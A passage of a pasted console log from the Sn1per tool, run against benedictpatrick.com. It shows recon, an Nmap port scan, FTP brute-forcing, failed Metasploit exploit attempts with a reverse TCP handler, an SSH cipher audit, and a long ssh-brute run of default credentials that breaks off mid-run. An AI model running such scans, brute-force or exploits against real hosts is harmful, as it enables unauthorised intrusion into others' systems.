  754. [-] Searching now in Ask..
  755. [-] Searching now in Netcraft..
  756. [-] Searching now in DNSdumpster..
  757. [-] Searching now in Virustotal..
  758. [-] Searching now in ThreatCrowd..
  759. [-] Searching now in SSL Certificates..
  760. [-] Searching now in PassiveDNS..
  761.  
  762.  ╔═╗╩═╗╔╩╗╔═╗╩ ╩
  763.  ║ ╠╩╝ ║ ╚═╗╠═╣
  764.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
  765.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
  766. 
  767.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-benedictpatrick.com-full.txt
  768. 
  769.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
  770.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
  771.  
  772.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
  773. PING benedictpatrick.com(2a01:9cc0:0:1:1a:3:0:5e (2a01:9cc0:0:1:1a:3:0:5e)) 56 data bytes
  774. 64 bytes from 2a01:9cc0:0:1:1a:3:0:5e (2a01:9cc0:0:1:1a:3:0:5e): icmp_seq=1 ttl=56 time=96.5 ms
  775.  
  776. --- benedictpatrick.com ping statistics ---
  777. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  778. rtt min/avg/max/mdev = 96.583/96.583/96.583/0.000 ms
  779.  
  780.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
  781.  
  782. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 22:23 EST
  783. Nmap scan report for benedictpatrick.com (185.119.174.103)
  784. Host is up (0.099s latency).
  785. Other addresses for benedictpatrick.com (not scanned): 2a01:9cc0:0:1:1a:3:0:5e
  786. rDNS record for 185.119.174.103: web564.webfaction.com
  787. Not shown: 465 filtered ports, 2 closed ports
  788. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  789. PORT STATE SERVICE
  790. 21/tcp open ftp
  791. 22/tcp open ssh
  792. 80/tcp open http
  793. 443/tcp open https
  794. 3306/tcp open mysql
  795. 5432/tcp open postgresql
  796.  
  797. Nmap done: 1 IP address (1 host up) scanned in 4.59 seconds
  798.  
  799.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
  800.  + -- --=[Port 21 opened... running tests...
  801.  
  802. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 22:23 EST
  803. Nmap scan report for benedictpatrick.com (185.119.174.103)
  804. Host is up (0.099s latency).
  805. Other addresses for benedictpatrick.com (not scanned): 2a01:9cc0:0:1:1a:3:0:5e
  806. rDNS record for 185.119.174.103: web564.webfaction.com
  807.  
  808. PORT STATE SERVICE VERSION
  809. 21/tcp open ftp vsftpd 3.0.2
  810. | ftp-brute:
  811. | Accounts: No valid accounts found
  812. |_ Statistics: Performed 1050 guesses in 183 seconds, average tps: 5.5
  813. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  814. Device type: general purpose
  815. Running: Linux 3.X|4.X
  816. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
  817. OS details: Linux 3.10 - 4.8, Linux 3.2 - 4.8
  818. Network Distance: 11 hops
  819. Service Info: OS: Unix
  820.  
  821. TRACEROUTE (using port 21/tcp)
  822. HOP RTT ADDRESS
  823. 1 0.99 ms 192.168.1.254
  824. 2 17.54 ms 10.135.18.1
  825. 3 30.54 ms 75.154.223.222
  826. 4 31.11 ms lag-113.ear3.NewYork1.Level3.net (4.15.212.245)
  827. 5 97.96 ms ae-226-3602.edge3.London15.Level3.net (4.69.167.94)
  828. 6 97.85 ms ae-228-3604.edge3.London15.Level3.net (4.69.167.102)
  829. 7 102.81 ms 212.187.195.54
  830. 8 100.82 ms 185.52.26.128
  831. 9 99.85 ms 185.52.26.183
  832. 10 98.30 ms uk.slo.prgn.b10.stk1.misp.co.uk (185.52.26.180)
  833. 11 101.16 ms web564.webfaction.com (185.119.174.103)
  834.  
  835. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  836. Nmap done: 1 IP address (1 host up) scanned in 185.91 seconds
  837. 
  838. Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
  839. EFLAGS: 00010046
  840. eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
  841. esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
  842. ds: 0018 es: 0018 ss: 0018
  843. Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
  844.  
  845. 
  846. Stack: 90909090990909090990909090
  847. 90909090990909090990909090
  848. 90909090.90909090.90909090
  849. 90909090.90909090.90909090
  850. 90909090.90909090.09090900
  851. 90909090.90909090.09090900
  852. ..........................
  853. cccccccccccccccccccccccccc
  854. cccccccccccccccccccccccccc
  855. ccccccccc.................
  856. cccccccccccccccccccccccccc
  857. cccccccccccccccccccccccccc
  858. .................ccccccccc
  859. cccccccccccccccccccccccccc
  860. cccccccccccccccccccccccccc
  861. ..........................
  862. ffffffffffffffffffffffffff
  863. ffffffff..................
  864. ffffffffffffffffffffffffff
  865. ffffffff..................
  866. ffffffff..................
  867. ffffffff..................
  868. 
  869.  
  870. Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
  871. Aiee, Killing Interrupt handler
  872. Kernel panic: Attempted to kill the idle task!
  873. In swapper task - not syncing
  874. 
  875.  
  876. =[ metasploit v4.16.28-dev ]
  877. + -- --=[ 1716 exploits - 985 auxiliary - 300 post ]
  878. + -- --=[ 507 payloads - 40 encoders - 10 nops ]
  879. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  880.  
  881. RHOST => benedictpatrick.com
  882. RHOSTS => benedictpatrick.com
  883. [-] benedictpatrick.com:21 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (benedictpatrick.com:21).
  884. [*] Exploit completed, but no session was created.
  885. [*] Started reverse TCP double handler on 2001:56b:dcc9:af00:7867:3e0c:1ab5:41fd:4444
  886. [-] benedictpatrick.com:21 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (benedictpatrick.com:21).
  887. [*] Exploit completed, but no session was created.
  888.  + -- --=[Port 22 opened... running tests...
  889. # general
  890. (gen) banner: SSH-2.0-OpenSSH_7.4
  891. (gen) software: OpenSSH 7.4
  892. (gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
  893. (gen) compression: enabled (zlib@openssh.com)
  894.  
  895. # key exchange algorithms
  896. (kex) curve25519-sha256 -- [warn] unknown algorithm
  897. (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
  898. (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
  899. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  900. (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
  901. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  902. (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
  903. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  904. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
  905. `- [info] available since OpenSSH 4.4
  906. (kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
  907. (kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
  908. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  909. `- [warn] using weak hashing algorithm
  910. `- [info] available since OpenSSH 2.3.0
  911. (kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
  912. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
  913. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  914. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  915. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
  916. `- [warn] using small 1024-bit modulus
  917. `- [warn] using weak hashing algorithm
  918. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  919.  
  920. # host-key algorithms
  921. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  922. (key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
  923. (key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
  924. (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
  925. `- [warn] using weak random number generator could reveal the key
  926. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  927. (key) ssh-ed25519 -- [info] available since OpenSSH 6.5
  928.  
  929. # encryption algorithms (ciphers)
  930. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  931. `- [warn] using weak cipher
  932. `- [warn] using weak cipher mode
  933. `- [warn] using small 64-bit block size
  934. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  935. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  936. `- [fail] disabled since Dropbear SSH 0.53
  937. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  938. `- [warn] using weak cipher mode
  939. `- [warn] using small 64-bit block size
  940. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  941. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  942. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  943. `- [warn] using weak cipher mode
  944. `- [warn] using small 64-bit block size
  945. `- [info] available since OpenSSH 2.1.0
  946. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  947. `- [warn] using weak cipher mode
  948. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  949. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  950. `- [warn] using weak cipher mode
  951. `- [info] available since OpenSSH 2.3.0
  952. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  953. `- [warn] using weak cipher mode
  954. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
  955. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  956. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  957. `- [warn] using weak cipher mode
  958. `- [info] available since OpenSSH 2.3.0
  959. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  960. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
  961. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  962. (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
  963. (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
  964. (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
  965. `- [info] default cipher since OpenSSH 6.9.
  966.  
  967. # message authentication code algorithms
  968. (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
  969. `- [info] available since OpenSSH 6.2
  970. (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
  971. (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
  972. (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
  973. (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
  974. `- [info] available since OpenSSH 6.2
  975. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
  976. `- [warn] using small 64-bit tag size
  977. `- [info] available since OpenSSH 4.7
  978. (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
  979. `- [info] available since OpenSSH 6.2
  980. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
  981. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  982. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
  983. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  984. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
  985. `- [warn] using weak hashing algorithm
  986. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  987.  
  988. # algorithm recommendations (for OpenSSH 7.4)
  989. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
  990. (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
  991. (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
  992. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
  993. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
  994. (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
  995. (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
  996. (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
  997. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
  998. (rec) -blowfish-cbc -- enc algorithm to remove
  999. (rec) -3des-cbc -- enc algorithm to remove
  1000. (rec) -aes256-cbc -- enc algorithm to remove
  1001. (rec) -cast128-cbc -- enc algorithm to remove
  1002. (rec) -aes192-cbc -- enc algorithm to remove
  1003. (rec) -aes128-cbc -- enc algorithm to remove
  1004. (rec) -hmac-sha2-512 -- mac algorithm to remove
  1005. (rec) -umac-128@openssh.com -- mac algorithm to remove
  1006. (rec) -hmac-sha2-256 -- mac algorithm to remove
  1007. (rec) -umac-64@openssh.com -- mac algorithm to remove
  1008. (rec) -hmac-sha1 -- mac algorithm to remove
  1009. (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
  1010. (rec) -umac-64-etm@openssh.com -- mac algorithm to remove
  1011.  
  1012.  
  1013. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 22:26 EST
  1014. NSE: [ssh-run] Failed to specify credentials and command to run.
  1015. NSE: [ssh-brute] Trying username/password pair: root:root
  1016. NSE: [ssh-brute] Trying username/password pair: admin:admin
  1017. NSE: [ssh-brute] Trying username/password pair: administrator:administrator
  1018. NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
  1019. NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
  1020. NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
  1021. NSE: [ssh-brute] Trying username/password pair: guest:guest
  1022. NSE: [ssh-brute] Trying username/password pair: user:user
  1023. NSE: [ssh-brute] Trying username/password pair: web:web
  1024. NSE: [ssh-brute] Trying username/password pair: test:test
  1025. NSE: [ssh-brute] Trying username/password pair: root:
  1026. NSE: [ssh-brute] Trying username/password pair: admin:
  1027. NSE: [ssh-brute] Trying username/password pair: administrator:
  1028. NSE: [ssh-brute] Trying username/password pair: webadmin:
  1029. NSE: [ssh-brute] Trying username/password pair: sysadmin:
  1030. NSE: [ssh-brute] Trying username/password pair: netadmin:
  1031. NSE: [ssh-brute] Trying username/password pair: guest:
  1032. NSE: [ssh-brute] Trying username/password pair: user:
  1033. NSE: [ssh-brute] Trying username/password pair: web:
  1034. NSE: [ssh-brute] Trying username/password pair: test:
  1035. NSE: [ssh-brute] Trying username/password pair: root:123456
  1036. NSE: [ssh-brute] Trying username/password pair: admin:123456
  1037. NSE: [ssh-brute] Trying username/password pair: administrator:123456
  1038. NSE: [ssh-brute] Trying username/password pair: webadmin:123456
  1039. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
  1040. NSE: [ssh-brute] Trying username/password pair: netadmin:123456
  1041. NSE: [ssh-brute] Trying username/password pair: guest:123456
  1042. NSE: [ssh-brute] Trying username/password pair: user:123456
  1043. NSE: [ssh-brute] Trying username/password pair: web:123456
  1044. NSE: [ssh-brute] Trying username/password pair: test:123456
  1045. NSE: [ssh-brute] Trying username/password pair: root:12345
  1046. NSE: [ssh-brute] Trying username/password pair: admin:12345
  1047. NSE: [ssh-brute] Trying username/password pair: administrator:12345
  1048. NSE: [ssh-brute] Trying username/password pair: webadmin:12345
  1049. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
  1050. NSE: [ssh-brute] Trying username/password pair: netadmin:12345
  1051. NSE: [ssh-brute] Trying username/password pair: guest:12345
  1052. NSE: [ssh-brute] Trying username/password pair: user:12345
  1053. NSE: [ssh-brute] Trying username/password pair: web:12345
  1054. NSE: [ssh-brute] Trying username/password pair: test:12345
  1055. NSE: [ssh-brute] Trying username/password pair: root:123456789
  1056. NSE: [ssh-brute] Trying username/password pair: admin:123456789
  1057. NSE: [ssh-brute] Trying username/password pair: administrator:123456789
  1058. NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
  1059. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
  1060. NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
  1061. NSE: [ssh-brute] Trying username/password pair: guest:123456789
  1062. NSE: [ssh-brute] Trying username/password pair: user:123456789
  1063. NSE: [ssh-brute] Trying username/password pair: web:123456789
  1064. NSE: [ssh-brute] Trying username/password pair: test:123456789
  1065. NSE: [ssh-brute] Trying username/password pair: root:password
  1066. NSE: [ssh-brute] Trying username/password pair: admin:password
  1067. NSE: [ssh-brute] Trying username/password pair: administrator:password
  1068. NSE: [ssh-brute] Trying username/password pair: webadmin:password
  1069. NSE: [ssh-brute] Trying username/password pair: sysadmin:password
  1070. NSE: [ssh-brute] Trying username/password pair: netadmin:password
  1071. NSE: [ssh-brute] Trying username/password pair: guest:password
  1072. NSE: [ssh-brute] Trying username/password pair: user:password
  1073. NSE: [ssh-brute] Trying username/password pair: web:password
  1074. NSE: [ssh-brute] Trying username/password pair: test:password
  1075. NSE: [ssh-brute] Trying username/password pair: root:iloveyou
  1076. NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
  1077. NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
  1078. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
  1079. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
  1080. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
  1081. NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
  1082. NSE: [ssh-brute] Trying username/password pair: user:iloveyou
  1083. NSE: [ssh-brute] Trying username/password pair: web:iloveyou
  1084. NSE: [ssh-brute] Trying username/password pair: test:iloveyou
  1085. NSE: [ssh-brute] Trying username/password pair: root:princess
  1086. NSE: [ssh-brute] Trying username/password pair: admin:princess
  1087. NSE: [ssh-brute] Trying username/password pair: administrator:princess
  1088. NSE: [ssh-brute] Trying username/password pair: webadmin:princess
  1089. NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
  1090. NSE: [ssh-brute] Trying username/password pair: netadmin:princess
  1091. NSE: [ssh-brute] Trying username/password pair: guest:princess
  1092. NSE: [ssh-brute] Trying username/password pair: user:princess
  1093. NSE: [ssh-brute] Trying username/password pair: web:princess
  1094. NSE: [ssh-brute] Trying username/password pair: test:princess
  1095. NSE: [ssh-brute] Trying username/password pair: root:12345678
  1096. NSE: [ssh-brute] Trying username/password pair: admin:12345678
  1097. NSE: [ssh-brute] Trying username/password pair: administrator:12345678
  1098. NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
  1099. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
  1100. NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
  1101. NSE: [ssh-brute] Trying username/password pair: guest:12345678
  1102. NSE: [ssh-brute] Trying username/password pair: user:12345678
  1103. NSE: [ssh-brute] Trying username/password pair: web:12345678
  1104. NSE: [ssh-brute] Trying username/password pair: test:12345678
  1105. NSE: [ssh-brute] Trying username/password pair: root:1234567
  1106. NSE: [ssh-brute] Trying username/password pair: admin:1234567
  1107. NSE: [ssh-brute] Trying username/password pair: administrator:1234567
  1108. NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
  1109. NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
  1110. NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
  1111. NSE: [ssh-brute] Trying username/password pair: guest:1234567
  1112. NSE: [ssh-brute] Trying username/password pair: user:1234567
  1113. NSE: [ssh-brute] Trying username/password pair: web:1234567
  1114. NSE: [ssh-brute] Trying username/password pair: test:1234567
  1115. NSE: [ssh-brute] Trying username/password pair: root:abc123
  1116. NSE: [ssh-brute] Trying username/password pair: admin:abc123
  1117. NSE: [ssh-brute] Trying username/password pair: administrator:abc123
  1118. NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
  1119. NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
  1120. NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
  1121. NSE: [ssh-brute] Trying username/password pair: guest:abc123
  1122. NSE: [ssh-brute] Trying username/password pair: user:abc123
  1123. NSE: [ssh-brute] Trying username/password pair: web:abc123
  1124. NSE: [ssh-brute] Trying username/password pair: test:abc123
  1125. NSE: [ssh-brute] Trying username/password pair: root:nicole
  1126. NSE: [ssh-brute] Trying username/password pair: admin:nicole
  1127. NSE: [ssh-brute] Trying username/password pair: administrator:nicole
  1128. NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
  1129. NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
  1130. NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
  1131. NSE: [ssh-brute] Trying username/password pair: guest:nicole
  1132. NSE: [ssh-brute] Trying username/password pair: user:nicole
  1133. NSE: [ssh-brute] Trying username/password pair: web:nicole
  1134. NSE: [ssh-brute] Trying username/password pair: test:nicole
  1135. NSE: [ssh-brute] Trying username/password pair: root:daniel
  1136. NSE: [ssh-brute] Trying username/password pair: admin:daniel
  1137. NSE: [ssh-brute] Trying username/password pair: administrator:daniel
  1138. NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
  1139. NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
  1140. NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
  1141. NSE: [ssh-brute] Trying username/password pair: guest:daniel
  1142. NSE: [ssh-brute] Trying username/password pair: user:daniel
  1143. NSE: [ssh-brute] Trying username/password pair: web:daniel
  1144. NSE: [ssh-brute] Trying username/password pair: test:daniel
  1145. NSE: [ssh-brute] Trying username/password pair: root:monkey
  1146. NSE: [ssh-brute] Trying username/password pair: admin:monkey
  1147. NSE: [ssh-brute] Trying username/password pair: administrator:monkey
  1148. NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
  1149. NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
  1150. NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
  1151. NSE: [ssh-brute] Trying username/password pair: guest:monkey
  1152. NSE: [ssh-brute] Trying username/password pair: user:monkey
  1153. NSE: [ssh-brute] Trying username/password pair: web:monkey
  1154. NSE: [ssh-brute] Trying username/password pair: test:monkey
  1155. NSE: [ssh-brute] Trying username/password pair: root:babygirl
  1156. NSE: [ssh-brute] Trying username/password pair: admin:babygirl
  1157. NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
  1158. NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
  1159. NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
  1160. NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
  1161. NSE: [ssh-brute] Trying username/password pair: guest:babygirl
  1162. NSE: [ssh-brute] Trying username/password pair: user:babygirl
  1163. NSE: [ssh-brute] Trying username/password pair: web:babygirl
  1164. NSE: [ssh-brute] Trying username/password pair: test:babygirl
  1165. NSE: [ssh-brute] Trying username/password pair: root:qwerty
  1166. NSE: [ssh-brute] Trying username/password pair: admin:qwerty
  1167. NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
  1168. NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
  1169. NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
  1170. NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
  1171. NSE: [ssh-brute] Trying username/password pair: guest:qwerty
  1172. NSE: [ssh-brute] Trying username/password pair: user:qwerty
  1173. NSE: [ssh-brute] Trying username/password pair: web:qwerty
  1174. NSE: [ssh-brute] Trying username/password pair: test:qwerty
  1175. NSE: [ssh-brute] Trying username/password pair: root:lovely
  1176. NSE: [ssh-brute] Trying username/password pair: admin:lovely
  1177. NSE: [ssh-brute] Trying username/password pair: administrator:lovely
  1178. NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
  1179. NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
  1180. NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
  1181. NSE: [ssh-brute] Trying username/password pair: guest:lovely
  1182. NSE: [ssh-brute] Trying username/password pair: user:lovely
  1183. NSE: [ssh-brute] Trying username/password pair: web:lovely
  1184. NSE: [ssh-brute] Trying username/password pair: test:lovely
  1185. NSE: [ssh-brute] Trying username/password pair: root:654321
  1186. NSE: [ssh-brute] Trying username/password pair: admin:654321
  1187. NSE: [ssh-brute] Trying username/password pair: administrator:654321
  1188. NSE: [ssh-brute] Trying username/password pair: webadmin:654321
  1189. NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
  1190. NSE: [ssh-brute] Trying username/password pair: netadmin:654321
  1191. NSE: [ssh-brute] Trying username/password pair: guest:654321
  1192. NSE: [ssh-brute] Trying username/password pair: user:654321
  1193. NSE: [ssh-brute] Trying username/password pair: web:654321
  1194. NSE: [ssh-brute] Trying username/password pair: test:654321
  1195. NSE: [ssh-brute] Trying username/password pair: root:michael
  1196. NSE: [ssh-brute] Trying username/password pair: admin:michael
  1197. NSE: [ssh-brute] Trying username/password pair: administrator:michael
  1198. NSE: [ssh-brute] Trying username/password pair: webadmin:michael
  1199. NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
  1200. NSE: [ssh-brute] Trying username/password pair: netadmin:michael
  1201. NSE: [ssh-brute] Trying username/password pair: guest:michael
  1202. NSE: [ssh-brute] Trying username/password pair: user:michael
  1203. NSE: [ssh-brute] Trying username/password pair: web:michael
  1204. NSE: [ssh-brute] Trying username/password pair: test:michael
  1205. NSE: [ssh-brute] Trying username/password pair: root:jessica
  1206. NSE: [ssh-brute] Trying username/password pair: admin:jessica
  1207. NSE: [ssh-brute] Trying username/password pair: administrator:jessica
  1208. NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
  1209. NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
  1210. NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
  1211. NSE: [ssh-brute] Trying username/password pair: guest:jessica
  1212. NSE: [ssh-brute] Trying username/password pair: user:jessica
  1213. NSE: [ssh-brute] Trying username/password pair: web:jessica
  1214. NSE: [ssh-brute] Trying username/password pair: test:jessica
  1215. NSE: [ssh-brute] Trying username/password pair: root:111111
  1216. NSE: [ssh-brute] Trying username/password pair: admin:111111
  1217. NSE: [ssh-brute] Trying username/password pair: administrator:111111
  1218. NSE: [ssh-brute] Trying username/password pair: webadmin:111111
  1219. NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
  1220. NSE: [ssh-brute] Trying username/password pair: netadmin:111111
  1221. NSE: [ssh-brute] Trying username/password pair: guest:111111
  1222. NSE: [ssh-brute] Trying username/password pair: user:111111
  1223. NSE: [ssh-brute] Trying username/password pair: web:111111
  1224. NSE: [ssh-brute] Trying username/password pair: test:111111
  1225. NSE: [ssh-brute] Trying username/password pair: root:ashley
  1226. NSE: [ssh-brute] Trying username/password pair: admin:ashley
  1227. NSE: [ssh-brute] Trying username/password pair: administrator:ashley
  1228. NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
  1229. NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
  1230. NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
  1231. NSE: [ssh-brute] Trying username/password pair: guest:ashley
  1232. NSE: [ssh-brute] Trying username/password pair: user:ashley
  1233. NSE: [ssh-brute] Trying username/password pair: web:ashley
  1234. NSE: [ssh-brute] Trying username/password pair: test:ashley
  1235. NSE: [ssh-brute] Trying username/password pair: root:000000
  1236. NSE: [ssh-brute] Trying username/password pair: admin:000000
  1237. NSE: [ssh-brute] Trying username/password pair: administrator:000000
  1238. NSE: [ssh-brute] Trying username/password pair: webadmin:000000
  1239. NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
  1240. NSE: [ssh-brute] Trying username/password pair: netadmin:000000
  1241. NSE: [ssh-brute] Trying username/password pair: guest:000000
  1242. NSE: [ssh-brute] Trying username/password pair: user:000000
  1243. NSE: [ssh-brute] Trying username/password pair: web:000000
  1244. NSE: [ssh-brute] Trying username/password pair: test:000000
  1245. NSE: [ssh-brute] Trying username/password pair: root:iloveu
  1246. NSE: [ssh-brute] Trying username/password pair: admin:iloveu
  1247. NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
  1248. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
  1249. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
  1250. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
  1251. NSE: [ssh-brute] Trying username/password pair: guest:iloveu
  1252. NSE: [ssh-brute] Trying username/password pair: user:iloveu
  1253. NSE: [ssh-brute] Trying username/password pair: web:iloveu
  1254. NSE: [ssh-brute] Trying username/password pair: test:iloveu
  1255. NSE: [ssh-brute] Trying username/password pair: root:michelle
  1256. NSE: [ssh-brute] Trying username/password pair: admin:michelle
  1257. NSE: [ssh-brute] Trying username/password pair: administrator:michelle
  1258. NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
  1259. NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
  1260. NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
  1261. NSE: [ssh-brute] Trying username/password pair: guest:michelle
